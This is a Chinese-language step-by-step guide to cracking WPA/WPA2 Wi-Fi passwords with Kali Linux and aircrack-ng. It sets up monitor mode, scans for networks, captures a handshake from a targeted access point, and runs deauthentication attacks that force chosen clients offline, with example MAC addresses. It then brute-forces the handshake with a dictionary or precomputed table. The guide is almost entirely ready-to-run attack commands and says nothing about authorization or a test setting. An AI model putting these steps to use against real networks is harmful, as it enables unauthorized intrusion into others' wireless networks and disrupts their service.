一、准备阶段
首先需要一个kali系统和一块支持混杂模式的无线网卡,嫌麻烦的可以下载live版:https://www.kali.org/get-kali/#kali-live,然后通过USBWriter将iso映像写入不用的u盘(注意会将u盘里的内容全部清空)
- 查看网卡
ifconfig -a
- 杀死多余进程
sudo airmon-ng check kill
- 开启监听模式
sudo airmon-ng start wlan0
二、扫描阶段
- 普通频段
sudo airodump-ng wlan0mon
或
# 过滤未连接的客户端
sudo airodump-ng wlan0mon -a
- 5G频段
sudo airodump-ng -C 5180-5885 wlan0mon
注:
(1) 交互
a 切换显示内容
s 切换排序列
空格 暂停/恢复屏幕刷新
三、抓包阶段
- 监听特定网络
sudo airodump-ng -c <信道> --bssid <AP的mac地址> -w <要保存到的文件名> wlan0mon
例:
sudo airodump-ng -c 6 --bssid 14:75:90:41:55:AE -w abc wlan0mon
注:
(1) 后台监听
nohup <命令> > /dev/null 2>&1 &
例:
nohup sudo airodump-ng -c 6 --bssid 14:75:90:41:55:AE -w abc wlan0mon > /dev/null 2>&1 &
- 攻击特定网络使其掉线
sudo aireplay-ng -0(DeAuth攻击) <攻击次数> -a <AP的mac地址> -c <攻击某个指定的客户端mac地址> wlan0mon
例:
sudo aireplay-ng -0 10 -a 14:75:90:41:55:AE -c EC:51:BC:FD:57:23 wlan0mon
注:
(1) 还可以试试攻击AP,即:没有-c参数
(2) 查看客户端地址macchanger --show wlan0mon
四、Hash爆破
- 查看握手包情况
aircrack-ng <握手包> # 或者用EWSA
- 用字典破解
aircrack-ng -a2 -b <AP的mac> -w <字典> <握手包>
- 制作彩虹表破解(可选)
airolib-ng <创建的数据库名称> --import essid <包含essid的文件,可包含多个>
airolib-ng <创建的数据库名称> --import passwd <字典>
airolib-ng <创建的数据库名称> --batch
aircrack-ng -r <创建的数据库名称> -e <AP的essid> <握手包>